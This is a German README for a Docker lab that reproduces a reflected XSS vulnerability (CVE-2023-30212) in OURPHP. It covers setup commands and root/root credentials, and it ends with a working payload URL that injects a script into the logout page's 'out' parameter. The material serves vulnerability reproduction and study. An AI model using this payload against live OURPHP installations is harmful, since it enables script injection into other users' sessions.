
Dies enthält die notwendigen Dateien und Docker, um eine Schwachstelle in OURPHP zu replizieren, die eine XSS-Schwachstelle (CVE-2023-30212) aufweist.
Dies enthält die notwendigen Verzeichnisse und die Dockerfile, um eine Sicherheitslücke in OURPHP zu replizieren, die eine XSS-Schwachstelle (CVE-2023-30212) aufweist.
VORAUSSETZUNGEN
Docker herunterladen
sudo apt install -y docker.io
Laden Sie die Dateien aus diesem Repository mit git clone herunter
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Dies enthält die notwendigen Verzeichnisse und die Dockerfile, um das Szenario zu replizieren.
Nach dem Herunterladen der Dateien erstellen Sie ein Docker-Image mit
sudo docker build -t <Geben_Sie_einen_geeigneten_Docker_Namen> . .
! Fügen Sie einen Namen für das Docker-Image hinzu, damit es später aufgerufen werden kann.
Konvertieren Sie das Docker-Image in einen Container mit
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Hier wird der Container-Port auf Port 80 gemappt.
Um den Status des Docker-Containers zu sehen,
sudo docker ps
Nach diesen Schritten,
Rufen Sie localhost auf und konfigurieren Sie OURPHP mit folgenden Anmeldedaten. Benutzername : root Passwort : root Datenbankname: data
Nun müssen Sie Benutzername und Passwort für die Administration konfigurieren. Setzen Sie Folgendes: Benutzername: root Passwort: root und fahren Sie fort
Unser Payload lautet also
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
Fügen Sie dies zusammen mit localhost oder 127.0.0.1 hinzu, um XSS auszulösen.